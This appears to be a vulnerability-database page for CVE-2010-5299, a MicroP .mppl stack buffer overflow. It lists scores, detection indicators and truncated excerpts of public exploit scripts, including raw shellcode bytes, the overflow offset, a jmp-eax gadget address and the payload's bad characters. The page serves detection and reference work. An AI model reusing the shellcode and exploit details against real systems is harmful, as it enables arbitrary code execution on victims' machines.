CVE-2010-5299
published 2014-05-23CVE-2010-5299: Stack-based buffer overflow in MicroP 0.1.1.1600 allows remote attackers to execute arbitrary code via a crafted .mppl file. NOTE: it has been reported that…
PriorityP350medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
33.58%
98.2th percentile
Stack-based buffer overflow in MicroP 0.1.1.1600 allows remote attackers to execute arbitrary code via a crafted .mppl file. NOTE: it has been reported that the overflow is in the lpFileName parameter of the CreateFileA function, but the overflow is probably caused by a separate, unnamed function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microp_project | microp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca
bytes↗
\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7
- →Malicious .mppl files trigger a stack-based buffer overflow at EIP offset 1276 (Metasploit module) or ~1163–1132 bytes (PoC exploits); detect anomalously large .mppl files or .mppl files containing high-entropy shellcode followed by a RET address. ↗
- →The exploit overwrites the lpFileName parameter of CreateFileA(); monitor for CreateFileA calls where the filename buffer originates from a .mppl file parse and is abnormally long. ↗
- →ROP/return gadget 0x100145B5 (jmp eax) in bass.dll is used as the EIP overwrite target across multiple exploits; flag execution transfers to this address from MicroP's process space. ↗
- →Bad characters for payload encoding are \x00, \x0a, \x0d; shellcode in malicious .mppl files will not contain null bytes, newlines, or carriage returns. ↗
- →The x86/shikata_ga_nai encoder is used on the shellcode payload embedded in the .mppl file; scan .mppl file content for shikata_ga_nai decoder stubs. ↗
- ·The overflow offset varies across exploit implementations (1276 in the Metasploit module vs. ~1132–1163 in the standalone PoCs), suggesting slight differences in environment or build; detection rules should account for a range of offsets. ↗
- ·Two different RET gadget addresses are used across exploits (0x100145B5 in bass.dll vs. 0x10022b63 in base.dll), indicating the gadget selection is environment-dependent; both should be monitored. ↗
- ·The NVD advisory notes the overflow is probably caused by a separate, unnamed function rather than directly in CreateFileA's lpFileName parameter; root-cause tracing should not stop at CreateFileA. ↗
- ·The exploit is classified as local/file-format (requires the victim to open a crafted .mppl file); it is not a network-reachable vulnerability despite the NVD 'remote attackers' wording. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
exploitdb·2014-03-14
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
---
#!/usr/bin/env ruby
# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Blog : http://www.ncoskun.com http://www.grisapka.org
# Vendor :http://sourceforge.net/projects/microp/
# Software link:http://sourceforge.net/projects/microp/files/latest/download
# version: 0.1.1.1600
# Tested on: windows XP sp2
# 4ewa2getha! ;)
print "\n"
print "\n"
print " by\n"
print " _ _ _ v2 _ \n"
print " | |_ ___| |_ ___ _ _ ___ ___|_|___|_| \n"
print " | . | .'| . | .'| | | .'| _| |_ -| | \n"
print " |___|__,|___|__,|_ |__,|_| |_|___|_| \n"
print " |___| \n"
print " \n"
print "\n"
print "\n"
#shellcode = http://www.exploit-db.com/exploits/28996/
#User32-free Messagebox Shellcode f
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-07-07
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: microp_mppl.rb 13114 2011-07-07 06:29:37Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA() function, and results
arbitrary code execution under the context
Exploit-DB
MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
exploitdb·2010-08-23
CVE-2010-5299 MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
---
# Exploit Title: MicroP malicious MPPL Buffer Overflow
# Date: 08/23/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/microp/
# Version: 0.1.1.1600
# Tested on: Windows XP SP3 EN
#! /usr/bin/evn ruby
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
boom = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70"
boom << "\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31"
boom << "\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4"
boom << "\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23"
boom << "\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32"
boom << "\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29"
boom << "\x21\xe7\x96\x60\xf5\x71\xca\x06\x35"
boom << "\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0"
boom <<
Metasploit
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
metasploit
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFileName parameter of a CreateFileA() function, and results arbitrary code execution under the context of the user.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/73627http://packetstormsecurity.com/files/125723/MicroP-0.1.1.1600-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/14720http://www.exploit-db.com/exploits/17502http://www.exploit-db.com/exploits/32261https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/microp_mppl.rbhttp://osvdb.org/show/osvdb/73627http://packetstormsecurity.com/files/125723/MicroP-0.1.1.1600-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/14720http://www.exploit-db.com/exploits/17502http://www.exploit-db.com/exploits/32261https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/microp_mppl.rb
2014-05-23
Published